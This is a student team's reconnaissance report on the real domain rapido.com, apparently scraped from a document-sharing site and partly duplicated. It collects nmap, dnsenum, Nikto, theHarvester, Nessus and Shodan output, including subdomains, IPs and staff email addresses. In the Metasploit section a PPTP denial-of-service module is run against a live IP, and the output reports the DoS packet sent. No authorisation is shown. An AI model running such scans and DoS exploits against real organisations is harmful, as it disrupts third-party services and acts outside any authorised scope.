Incognito Final Report PDF

TEAM INCOGNITO
TEAM MEMBERS: DIVYA: SHIRISHA: RAJESH: SAI: BALU

DOMAIN NAME : RAPIDO.COM
On the commuter-side, Rapido works like any other taxi-booking app. To book a ride, users
have to sign up and enter pickup and destination points. Once the booking is confirmed, the name,
photo, and bike number of the Captain is shared with them.
USING TOOL NAME : WHOISDOMAINTOOL.COM
Whois is a widely used Internet record listing that identifies who owns a domain and how to
get in contact with them.
IP ADDRESS : 52.84.162.17
USING TOOL NAME : VIRUSTOTAL.COM
This web site is used to find the sub domains of the target.
 faq.rapido.com
 static.rapido.com
 www.rapido.com
 pay.rapido.com
 c.rapido.com
 email.rapido.com
USING TOOL NAME : NMAP
Nmap, short for Network Mapper, is a free and open source tool used for vulnerability checking, port
scanning and, of course, network mapping.
Some commands for NMAP
 nmap –sV (ports, state, services and version)

 nmap <ip range> (to find the range)
 nmap -p <numeric value> <IP> (to find the specific port and entire port)
 Nmap -sP <target> (ping scan using nmap)
 nmap — open <ip address> (to detect the open ports)
NMAP SCANNING
nmap -sV 52.84.162.17 (RAPIDO.COM),
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-02 07:17 EDT
Nmap scan report for server-52-84-162-17.sea19.r.cloudfront.net (52.84.162.17)
Host is up (0.28s latency).

Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp?
80/tcp open http Cloudflare http proxy
443/tcp open ssl/http Cloudflare http proxy
554/tcp open rtsp?
1723/tcp open pptp?
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.18 seconds
USING TOOL NAME : METASPLOIT
Metasploit is the world's leading open-source penetrating framework used by security engineers as a
penetration testing system and a development platform that allows to create security tools and
exploits.
penetration testing
msf6 auxiliary(dos/pptp/ms02_063_pptp_dos) > search pptp
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/linux/gather/pptpd_chap_secrets normal No Linux Gather PPTP VPN chap-secrets

Credentials
1 auxiliary/dos/pptp/ms02_063_pptp_dos 2002-09-26 normal No MS02-063 PPTP Malformed

Control Data Kernel Denial of Service
2 exploit/linux/pptp/poptop_negative_read 2003-04-09 great Yes Poptop Negative Read Overflow
3 post/windows/manage/pptp_tunnel normal No Windows Manage Remote Point-to-Point

Tunneling Protocol
Interact with a module by name or index. For example info 3, use 3 or use post/windows/manage/pptp_tunnel
msf6 auxiliary(dos/pptp/ms02_063_pptp_dos) > use 1
msf6 auxiliary(dos/pptp/ms02_063_pptp_dos) > show options
Module options (auxiliary/dos/pptp/ms02_063_pptp_dos):
Name Current Setting Required Description

---- --------------- -------- -----------
RHOSTS 52.84.162.17 yes The target host(s), see https://github.com/rapid7/metasploit-

framework/wiki/Using-Metasploit
RPORT 1723 yes The target port (TCP)
msf6 auxiliary(dos/pptp/ms02_063_pptp_dos) > set RHOSTS 104.16.51.11
RHOSTS => 104.16.51.11
msf6 auxiliary(dos/pptp/ms02_063_pptp_dos) > show options
Module options (auxiliary/dos/pptp/ms02_063_pptp_dos):
Name Current Setting Required Description
---- --------------- -------- -----------
[*] 104.16.51.11:1723 - Sending PPTP DoS Packet...
[*] 104.16.51.11:1723 - Packet sent. Kernel should halt on a Stop Error (BSOD).
[*] Auxiliary module execution completed
USING TOOL NAME: DNS ENUM

Dnsenum is a perlmultithreaded to enumerate DNS information of a domain and to discover non-
contiscript guous ip blocks. The main purpose of Dnsenum is to gather as much information as
possible about a domain.
└─$ dnsenum --enum rapido.com
dnsenum VERSION:1.2.6
----- rapido.com -----

Host's addresses:
__________________
rapido.com. 60 IN A 13.249.235.101
rapido.com. 60 IN A 13.249.235.39
rapido.com. 60 IN A 13.249.235.117
rapido.com. 60 IN A 13.249.235.46
Name Servers:
______________
ns-189.awsdns-23.com. 153759 IN A 205.251.192.189
ns-897.awsdns-48.net. 27864 IN A 205.251.195.129
ns-1983.awsdns-55.co.uk. 21608 IN A 205.251.199.191
ns-1450.awsdns-53.org. 143314 IN A 205.251.197.170
Mail (MX) Servers:
___________________
alt4.aspmx.l.google.com. 138 IN A 64.233.171.26
aspmx.l.google.com. 293 IN A 142.251.12.27
Trying Zone Transfers and getting Bind Versions:
_________________________________________________
USING TOOL NAME : HUNTER.IO

This tool is used to find the target email address.
Email ID : info@rapido.com
USING TOOL NAME: WAPPALYZER TECHNOLOGY
Wappalyzer is a technology profiler that shows you what websites are built with. Find out what CMS a website
is using, as well as any framework, ecommerce platform, JavaScript libraries and many more.
 CMS : CONTENTFULL
 MARKETING AUTOMATION : VWO ENGAGE
 ANALYTIC : VWO ; GOOGLE ANALYTICS
 ADVERTISING : MICROSOFT ADVERTISING
 JAVA SCRIPT FRAMWORK : MUSTACHE 2.2.1 ; VUE.JS ; NUXT.JS
 TAG MANAGERS : GOOGLE TAG MANAGER
 JAVA SCRIPT LIBEARIES : LODUSH 4.17.21 ;JQUERY 3.5.1 ; CORE-JS 2.6.12
 FORNT SCRIPT : TYPEKIT ; GOOGLE FONT API
 PAAS : AMAZON WEB SERVICES
 WEB FRAME WORKS : NUXT.JS
 MIS CELLANEOUS : WEB PACK
 REVIEWS : TRUSTPILLOT
 WEB SERVER : NUXT.JS
 PROGRAMING LANGUAGES : NODE.JS
 CDN : AMAZON CLOUDFRONT
 CUSTOMER DATA PLATFORM : BLUE CONIC
USING TOOL NAME : HTTPSTATUS.IO

This web site is used to sub-domains checker and it gives the valid ulr.
Httpstatus.io : http://rapido.com
USING TOOL NAME : MALTEGO

 It is used for gathering information for security related work. ...
 It will help you in the thinking process by demonstrating connected links between all the searched
items.
 If you want to get hidden information, it(Maltego) can help you to discover it.
USING TOOL 1NAME : BURP SUITE
Burp Suite is an integrated platform/graphical tool for performing security testing of web applications. Its
various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of
an application's attack surface, through to finding and exploiting security vulnerabilities.
USING TOOL NAME : NESSUS
Nessus is a remote security scanning tool, which scans a computer and raises an alert if it discovers any
vulnerabilities that malicious hackers could use to gain access to any computer you have connected to a
network.
 HTTP Server Type and Version;
 Description:
This plugin attempts to determine the type and the version of the remote web server.
 HyperText Transfer Protocol (HTTP) Information:
 Description:
This test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive
and HTTP pipelining are enabled, etc…
 Nessus SYN scanner:
 Description:
This plugin is a SYN 'half-open' port scanner. It shall be reasonably quick even against a firewalled target.
 Service Detection:
 Description:
Nessus was able to identify the remote service by its banner or by looking at the error message it sends when it
receives an HTTP request.
 Common Platform Enumeration (CPE):
 Description:
By using information obtained from a Nessus scan, this plugin reports CPE (Common Platform Enumeration)
matches for various hardware and software products found on a host.
 Device Type:
 Description:
Based on the remote operating system, it is possible to determine what the remote system type is (eg: a printer,
router, general-purpose computer, etc).
 Host Fully Qualified Domain Name (FQDN) Resolution:
 Description:
Nessus was able to resolve the fully qualified domain name (FQDN) of the remote host.
 HTTP Proxy Open Relay Detection:
 Description:
The remote web proxy accepts unauthenticated HTTP requests from the Nessus scanner. By routing requests
through the affected proxy, a user may be able to gain some degree of anonymity while browsing websites,
which will see requests as originating from the remote host itself rather than the user's host.
 Nessus Scan Information:
 Description:
This plugin displays, for each tested host, information about the scan itself :
- The version of the plugin set.
- The type of scanner (Nessus or Nessus Home).
- The version of the Nessus Engine.
- The port scanner(s) used.
- The port range scanned.
- The ping round trip time
- Whether credentialed or third-party patch management checks are possible.
- Whether the display of superseded patches is enabled
- The date of the scan.
- The duration of the scan.
- The number of hosts scanned in parallel.
- The number of checks done in parallel.
 OS Identification:
 Description:
Using a combination of remote probes (e.g., TCP/IP, SMB, HTTP, NTP, SNMP, etc.), it is possible to guess the
name of the remote operating system in use. It is also possible sometimes to guess the version of the
operating system.
 TCP/IP Timestamps Supported:
 Description:
The remote host implements TCP timestamps, as defined by RFC1323. A side effect of this feature is that the
uptime of the remote host can sometimes be computed.
 Traceroute Information:
 Description:
Makes a traceroute to the remote host

USEDTOOL NAME:NIKTO
Nikto is an Open Source software written in Perl language that is used to scan a web-server for the
vulnerability that can be exploited and can compromise the server.
nikto -h rapido.com
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 13.249.235.46
+ Target Hostname: rapido.com
+ Target Port: 80
+ Message: Multiple IP addresses found: 13.249.235.46, 13.249.235.101,
13.249.235.117, 13.249.235.39
+ Start Time: 2022-08-05 00:50:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: CloudFront
+ Retrieved via header: 1.1 a9b691f245c119185c9460c052954cac.cloudfront.net
(CloudFront)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to
protect against some forms of XSS
+ Uncommon header 'x-amz-cf-id' found, with contents:
RGXskvBTQXTa3bZLO6qQgpfYxyv3wUPzW6-STS7KEmrUpx_EUrFEIw==
+ Uncommon header 'x-amz-cf-pop' found, with contents: HYD50-C3
+ Uncommon header 'x-cache' found, with contents: Redirect from cloudfront
+ The X-Content-Type-Options header is not set. This could allow the user agent to render
the content of the site in a different fashion to the MIME type
+ Root page / redirects to: https://rapido.com/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
USED TOOLS NAME:-DNSDUMBUSTER
DNS SERVERS :-
ns-1450.awsdns-53.org.
205.251.197.170 AMAZON-02
ns-1450.awsdns-53.org United States
ns-189.awsdns-23.com.
205.251.192.189 AMAZON-02
ns-189.awsdns-23.com United States
ns-1983.awsdns-55.co.uk.
205.251.199.191 AMAZON-02
ns-1983.awsdns-55.co.uk United States
ns-897.awsdns-48.net.
205.251.195.129 AMAZON-02
ns-897.awsdns-48.net United States
USED TOOL NAME :-THEHARVESTETR
The package contains a tool for gathering subdomain names, e-mail addresses, virtual hosts, open
ports/ banners, and employee names from different public
─(kali㉿kali)-[~]
└─$ theHarvester -b all -d rapido.com

*******************************************************************
* _ _ _ *
* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
* | __| _ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
* *
* theHarvester 4.0.3 *
* Coded by Christian Martorella *
* Edge-Security Research *
* cmartorella@edge-security.com *
* *
*******************************************************************
[*] Target: rapido.com
[!] Missing API key for RocketReach.
[!] Missing API key for fullhunt.
[!] Missing API key for zoomeye.
[!] Missing API key for Github.

^[[B^[[B^[[B
[!] Missing API key for ProjectDiscovery.
[!] Missing API key for PentestTools.
[!] Missing API key for binaryedge.
[!] Missing API key for Censys ID and/or Secret.
[!] Missing API key for Hunter.
[!] Missing API key for Securitytrail.
[!] Missing API key for Spyse.
[!] Missing API key for Intelx.

[*] Searching Urlscan.
[*] Searching Dnsdumpster.
[*] Searching Omnisint.
Searching 0 results.
[*] Searching Qwant.
[*] Searching Google.
Searching results.
[*] Searching Certspotter.
An exception has occurred: 0, message='Attempt to decode JSON with unexpected

mimetype: text/html', url=URL('https://api.n45ht.or.id/v1/subdomain-
enumeration?domain=rapido.com')
Google is blocking your ip and the workaround, returning
[*] Searching Anubis.
[*] Searching Rapiddns.
An exception has occurred: [Errno 104] Connection reset by peer
[*] Searching Hackertarget.
[*] Searching Trello.
[*] Searching CRTsh.
[*] Searching Duckduckgo.
[*] Searching Linkedin.
[*] Searching Bing.
[*] Searching Threatminer.
[*] Searching Otx.
An exception has occurred: Cannot connect to host dns.bufferover.run:443
ssl:<ssl.SSLContext object at 0x7f74205289c0> [Name or service not known]
[*] Searching Threatcrowd.
Searching results.
[*] Searching Sublist3r.
[*] Searching Virustotal.
An exception has occurred: Cannot connect to host www.baidu.com:443 ssl:<ssl.SSLContext
object at 0x7f742052ae40> [Connection reset by peer]
object at 0x7f7420528ac0> [Connection reset by peer]
object at 0x7f7420528540> [Connection reset by peer]
object at 0x7f742052b140> [Connection reset by peer]
object at 0x7f74204cc8c0> [Connection reset by peer]
object at 0x7f74204cf340> [Connection reset by peer]
object at 0x7f74204ce340> [Connection reset by peer]
object at 0x7f74204cd540> [Connection reset by peer]
object at 0x7f74204cd2c0> [Connection reset by peer]
object at 0x7f74204cf4c0> [Connection reset by peer]
object at 0x7f74204cef40> [Connection reset by peer]
object at 0x7f74204ceac0> [Connection reset by peer]
object at 0x7f74204cc740> [Connection reset by peer]
object at 0x7f74204cff40> [Connection reset by peer]
object at 0x7f742052afc0> [Connection reset by peer]
object at 0x7f74204ccc40> [Connection reset by peer]
object at 0x7f74204cfcc0> [Connection reset by peer]
object at 0x7f74204cc0c0> [Connection reset by peer]
object at 0x7f74204ccbc0> [Connection reset by peer]
object at 0x7f74204cce40> [Connection reset by peer]
object at 0x7f74204ce2c0> [Connection reset by peer]
object at 0x7f74204cc940> [Connection reset by peer]
object at 0x7f74204cde40> [Connection reset by peer]
object at 0x7f74204cea40> [Connection reset by peer]
object at 0x7f74204ce7c0> [Connection reset by peer]
An exception has occurred: Cannot connect to host wappass.baidu.com:443
ssl:<ssl.SSLContext object at 0x7f74204cd6c0> [Connection reset by peer]
ssl:<ssl.SSLContext object at 0x7f74204cd840> [Connection reset by peer]
ssl:<ssl.SSLContext object at 0x7f74204cc340> [Connection reset by peer]
ssl:<ssl.SSLContext object at 0x7f74204cdb40> [Connection reset by peer]
ssl:<ssl.SSLContext object at 0x7f74204cee40> [Connection reset by peer]
ssl:<ssl.SSLContext object at 0x7f74204cc7c0> [Connection reset by peer]
ssl:<ssl.SSLContext object at 0x7f74204cf1c0> [Connection reset by peer]
ssl:<ssl.SSLContext object at 0x7f742052bcc0> [Connection reset by peer]
ssl:<ssl.SSLContext object at 0x7f74204ce3c0> [Connection reset by peer]
ssl:<ssl.SSLContext object at 0x7f74204cca40> [Connection reset by peer]
ssl:<ssl.SSLContext object at 0x7f74204cefc0> [Connection reset by peer]
ssl:<ssl.SSLContext object at 0x7f74204cf540> [Connection reset by peer]
[*] Searching Baidu.
[*] Searching Linkedin.
[*] ASNS found: 3
--------------------
AS16276
AS16509
AS21409
[*] No Twitter users found.

[*] No LinkedIn users found.
[*] Trello URLs found: 91
--------------------
https://trello.com/
https://trello.com/es/guide/enterprise/activate-views
https://trello.com/es/guide/enterprise/advanced-features
https://trello.com/es/guide/enterprise/trello-basics
https://trello.com/it/guide/automate-anything
https://trello.com/it/use-cases/brainstorming
https://trello.com/pt-br/about
https://trello.com/pt-br/acknowledgements
https://trello.com/pt-br/butler-automation
https://trello.com/pt-br/contact
https://trello.com/pt-br/customers
https://trello.com/pt-br/customers/burgerfi
https://trello.com/pt-br/customers/desk-plants
https://trello.com/pt-br/customers/dosomethingorg
https://trello.com/pt-br/customers/instinct-dog-training
https://trello.com/pt-br/customers/mccorvey-sheet-metal
https://trello.com/pt-br/customers/palace-law
https://trello.com/pt-br/customers/scan2cad
https://trello.com/pt-br/customers/swagup
https://trello.com/pt-br/customers/unicef
https://trello.com/pt-br/education
https://trello.com/pt-br/enterprise
https://trello.com/pt-br/explore/trello-for-marketing
https://trello.com/pt-br/explore/trello-for-project-management
https://trello.com/pt-br/guide
https://trello.com/pt-br/guide/activate-views
https://trello.com/pt-br/guide/enterprise
https://trello.com/pt-br/guide/enterprise/activate-views
https://trello.com/pt-br/guide/enterprise/admins-dashboard
https://trello.com/pt-br/guide/enterprise/advanced-features
https://trello.com/pt-br/guide/enterprise/creating-projects-inviting-members
https://trello.com/pt-br/guide/enterprise/help
https://trello.com/pt-br/guide/enterprise/personality
https://trello.com/pt-br/guide/enterprise/power-ups
https://trello.com/pt-br/guide/enterprise/trello-basics
https://trello.com/pt-br/guide/enterprise/understanding-workspaces
https://trello.com/pt-br/guide/permissions-controls
https://trello.com/pt-br/guide/premium
https://trello.com/pt-br/guide/remote-work/communication-collaboration
https://trello.com/pt-br/guide/remote-work/company-culture
https://trello.com/pt-br/guide/remote-work/digital-tools
https://trello.com/pt-br/guide/remote-work/tips-best-practices
https://trello.com/pt-br/guide/tips-tricks
https://trello.com/pt-br/guide/trello-101
https://trello.com/pt-br/integrations
https://trello.com/pt-br/integrations/analytics-reporting
https://trello.com/pt-br/integrations/developer-tools
https://trello.com/pt-br/integrations/marketing-social-media
https://trello.com/pt-br/integrations/product-design
https://trello.com/pt-br/integrations/sales-support
https://trello.com/pt-br/legal/security
https://trello.com/pt-br/magic
https://trello.com/pt-br/platforms/google
https://trello.com/pt-br/platforms/slack
https://trello.com/pt-br/premium
https://trello.com/pt-br/pricing
https://trello.com/pt-br/standard
https://trello.com/pt-br/teams
https://trello.com/pt-br/teams/design
https://trello.com/pt-br/teams/humanresources
https://trello.com/pt-br/teams/remote-team-management
https://trello.com/pt-br/teams/startups
https://trello.com/pt-br/teams/support
https://trello.com/pt-br/teams/team-management
https://trello.com/pt-br/tour
https://trello.com/pt-br/trello-day-replay
https://trello.com/pt-br/trust
https://trello.com/pt-br/unsplash
https://trello.com/pt-br/use-cases
https://trello.com/pt-br/use-cases/brainstorming
https://trello.com/pt-br/use-cases/meetings
https://trello.com/pt-br/use-cases/project-management
https://trello.com/pt-br/use-cases/task-management
https://trello.com/pt-br/views/calendar
https://trello.com/pt-br/views/dashboard
https://trello.com/pt-br/views/map
https://trello.com/pt-br/views/table
https://trello.com/pt-br/views/timeline
https://trello.com/pt-br/webinars
https://trello.com/shortcuts
https://trello.com/teams/engineering
https://trello.com/templates/business/suporte-t
https://trello.com/templates/design/modelo-de-requisicao-de-design-ntjy48bq
https://trello.com/templates/design/sprint-de-design-544gcguf
https://trello.com/templates/operations-hr/integra
https://trello.com/templates/operations-hr/processo-de-integra
https://trello.com/templates/personal/apartamento-para-alugar-fths8ted
https://trello.com/templates/team-management/reuni
https://trello.com/templates/team-management/template-quadro-recepcao-para-pousadas-
0cpm7kk7
https://trello.com/tour
https://trello.com/your/account
[*] IPs found: 800

-------------------
13.32.81.56
13.32.81.63
13.32.81.107
13.32.83.37
13.32.83.116
13.32.83.121
13.32.99.63
13.32.99.107
13.32.99.123
13.32.202.110
13.32.202.114
13.32.202.128
13.32.204.22
13.32.204.25
13.32.204.51
13.32.204.72
13.32.207.64
[*] Emails found: 3
compras@paserapido.com
info@rapido.com
support@rapido.com
[*] Hosts found: 87
autodiscover.rapido.com.co
blog.rapido.com.ua
c.rapido.com:104.17.122.18, 104.17.121.18
c.rapido.com:104.17.121.18, 104.17.122.18
cpanel.rapido.com.my:103.6.198.121
cpanel.rapido.com.ua
cpcalendars.rapido.com.co
cpcalendars.rapido.com.my:103.6.198.121
cpcalendars.rapido`.com.ua
cpcontacts.rapido.com.co
cpcontacts.rapido.com.my:103.6.198.121
cpcontacts.rapido.com.ua
demo.rapido.com.my
dom.rapido.com.ua
email.rapido.com
email.rapido.com:104.16.210.86
email.rapido.com:r1-smtp-in-2.dotmailer.co.uk
email.rapido.com:r1-smtp-in-1.dotmailer.co.uk
faq.rapido.com:104.16.51.111, 104.16.53.111
faq.rapido.com:rapidocom.zendesk.com
faq.rapido.com:104.16.53.111, 104.16.51.111
faq.rapido.com:mail-pod-18.int.zendesk.com
faq.rapido.com:rapidocom.zendesk.com.
job.rapido.com.ua
mail.rapido.com.co
mail.rapido.com.my:103.6.198.121
mail.rapido.com.tr:168.119.145.131
mail.rapido.com.tw:211.22.63.76
mail.rapido.com.ua
mail.rapido.com.uy:200.40.204.69
pay.rapido.com:54.171.137.22, 3.251.23.0, 54.154.225.51
pay.rapido.com:3.251.23.0, 54.154.225.51, 54.171.137.22
pay.rapido.com:52.31.27.215
pay.rapido.com:54.171.137.22, 54.154.225.51, 3.251.23.0
pay.rapido.com:54.154.225.51, 3.251.23.0, 54.171.137.22
shop.rapido.com.tr:23.227.38.65
stage.rapido.com.ua
staging.rapido.com.ua
static.rapido.com:13.32.145.99, 13.32.145.62, 13.32.145.42, 13.32.145.101
static.rapido.com:13.32.145.101, 13.32.145.42, 13.32.145.62, 13.32.145.99
static.rapido.com:d2669ijg7ahnmh.cloudfront.net
static.rapido.com:d2669ijg7ahnmh.cloudfront.net.
support.ukrnames.com.rapido.com.ua
test.rapido.com.ua
webdisk.rapido.com.co
webdisk.rapido.com.my:103.6.198.121
webmail.rapido.com.my:103.6.198.121
webmail.rapido.com.ua
www.demo.rapido.com.my
www.pay.rapido.com
www.rapido.com:13.33.21.91
www.rapido.com:13.249.9.83, 13.249.9.61, 13.249.9.42, 13.249.9.6
www.rapido.com:13.249.9.61, 13.249.9.42, 13.249.9.83, 13.249.9.6
www.rapido.com:13.249.9.42, 13.249.9.83, 13.249.9.6, 13.249.9.61
www.rapido.com:13.249.9.61, 13.249.9.6, 13.249.9.83, 13.249.9.42
www.rapido.com:13.249.9.6, 13.249.9.42, 13.249.9.61, 13.249.9.83
www.rapido.com:13.249.9.61, 13.249.9.42, 13.249.9.6, 13.249.9.83
www.rapido.com.ng:52.60.87.163
www.rapido.com.qa:35.213.129.245
www.rapido.com.tr:193.70.57.224
www.rapido.com.ua
www.rapido.com.uy:190.64.69.90
x22www.rapido.com
UESDTOOL NAME: SHODAN.IO
Shodan Report
Rapido
Open ports
o 443
o 3389
o 81
o 8081
o 80
Organization
o Unified Layer
o Google LLC
o Mundivox LTDA
o TELEFÔNICA BRASIL S.A
o Aliyun Computing Co., LTD
Vulnerabilities
No information avallible
Products
o Apache httpd
o Exim smtpd
o Remote Desktop Protocol
o Microsoft IIS httpd
o AirSpace DVR
Tags
o self-signed
o cloud
o starttls
o vpn
o videogame
Operating Systems
o MikroTik RouterOS 6.47.10

o Windows (Build 10.0.14393)
o Windows 7 Professional
Website Titles
o RouterOS router configuration page

o Intelbras
o 302 Found
o Les services Rapido sur mesure et exp...
o Not Found
Web Technologies
o Bootstrap
o Google Tag Manager
o Slick
o jQuery
o jQuery UI
SSL/ TLS Versions
o tlsv1.2
o tlsv1
o tlsv1.1
o tlsv1.3
o sslv3
JARM Fingerprints
o 26d26d16d26d26d22c26d26d26d26dfd9c9d1...
o 0000000000000000000000000000000000000...
o 05d02d20d21d20d00005d02d05d20d597e681...
o 05d02d20d21d20d05c05d02d05d20d74fcf65...
o 14d14d16d14d14d08c14d14d14d14dfd9c9d1...
JA3S Fingerprints
o 873bc234a06e363e550fcfe0dd382a6c
o a70303593a393dfd863b76d9da6c3ace
o 364ff14b04ef93c3b4cfa429d729c0d9
o 378bca6b37a511c71501b117b1aa4e5c
o f3afa07016296e8ebe0edf7150534bd9
THANK YOU

Incognito Final Report PDF

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Incognito Final Report PDF

Uploaded by

Copyright:

Available Formats

TEAM INCOGNITO

TEAM MEMBERS: DIVYA: SHIRISHA: RAJESH: SAI: BALU

USING TOOL NAME : WHOISDOMAINTOOL.COM

USING TOOL NAME : VIRUSTOTAL.COM

USING TOOL NAME : NMAP

 nmap –sV (ports, state, services and version)

Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-02 07:17 EDT

Nmap scan report for server-52-84-162-17.sea19.r.cloudfront.net (52.84.162.17)

Host is up (0.28s latency).

PORT STATE SERVICE VERSION

21/tcp open ftp?

80/tcp open http Cloudflare http proxy

443/tcp open ssl/http Cloudflare http proxy

554/tcp open rtsp?

1723/tcp open pptp?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 35.18 seconds

USING TOOL NAME : METASPLOIT

msf6 auxiliary(dos/pptp/ms02_063_pptp_dos) > search pptp

# Name Disclosure Date Rank Check Description

- ---- --------------- ---- ----- -----------

0 post/linux/gather/pptpd_chap_secrets normal No Linux Gather PPTP VPN chap-secrets

1 auxiliary/dos/pptp/ms02_063_pptp_dos 2002-09-26 normal No MS02-063 PPTP Malformed

2 exploit/linux/pptp/poptop_negative_read 2003-04-09 great Yes Poptop Negative Read Overflow

3 post/windows/manage/pptp_tunnel normal No Windows Manage Remote Point-to-Point

msf6 auxiliary(dos/pptp/ms02_063_pptp_dos) > use 1

msf6 auxiliary(dos/pptp/ms02_063_pptp_dos) > show options

Module options (auxiliary/dos/pptp/ms02_063_pptp_dos):

Name Current Setting Required Description

RHOSTS 52.84.162.17 yes The target host(s), see https://github.com/rapid7/metasploit-

RPORT 1723 yes The target port (TCP)

msf6 auxiliary(dos/pptp/ms02_063_pptp_dos) > set RHOSTS 104.16.51.11

RHOSTS => 104.16.51.11

msf6 auxiliary(dos/pptp/ms02_063_pptp_dos) > show options

Module options (auxiliary/dos/pptp/ms02_063_pptp_dos):

Name Current Setting Required Description

---- --------------- -------- -----------

[*] 104.16.51.11:1723 - Sending PPTP DoS Packet...

[*] Auxiliary module execution completed

USING TOOL NAME: DNS ENUM

----- rapido.com -----

ns-189.awsdns-23.com. 153759 IN A 205.251.192.189

ns-897.awsdns-48.net. 27864 IN A 205.251.195.129

ns-1983.awsdns-55.co.uk. 21608 IN A 205.251.199.191

ns-1450.awsdns-53.org. 143314 IN A 205.251.197.170

Mail (MX) Servers:

alt1.aspmx.l.google.com. 114 IN A 173.194.202.26

alt2.aspmx.l.google.com. 114 IN A 142.250.141.27

aspmx.l.google.com. 293 IN A 142.251.12.27

alt3.aspmx.l.google.com. 293 IN A 142.250.115.27

Trying Zone Transfers and getting Bind Versions:

USING TOOL NAME : HUNTER.IO

USING TOOL NAME: WAPPALYZER TECHNOLOGY

USING TOOL NAME : HTTPSTATUS.IO

USING TOOL NAME : MALTEGO

 HTTP Server Type and Version;

 HyperText Transfer Protocol (HTTP) Information:

 Nessus SYN scanner:

 Common Platform Enumeration (CPE):

 Host Fully Qualified Domain Name (FQDN) Resolution:

 HTTP Proxy Open Relay Detection:

 Nessus Scan Information:

- The type of scanner (Nessus or Nessus Home).

- The version of the Nessus Engine.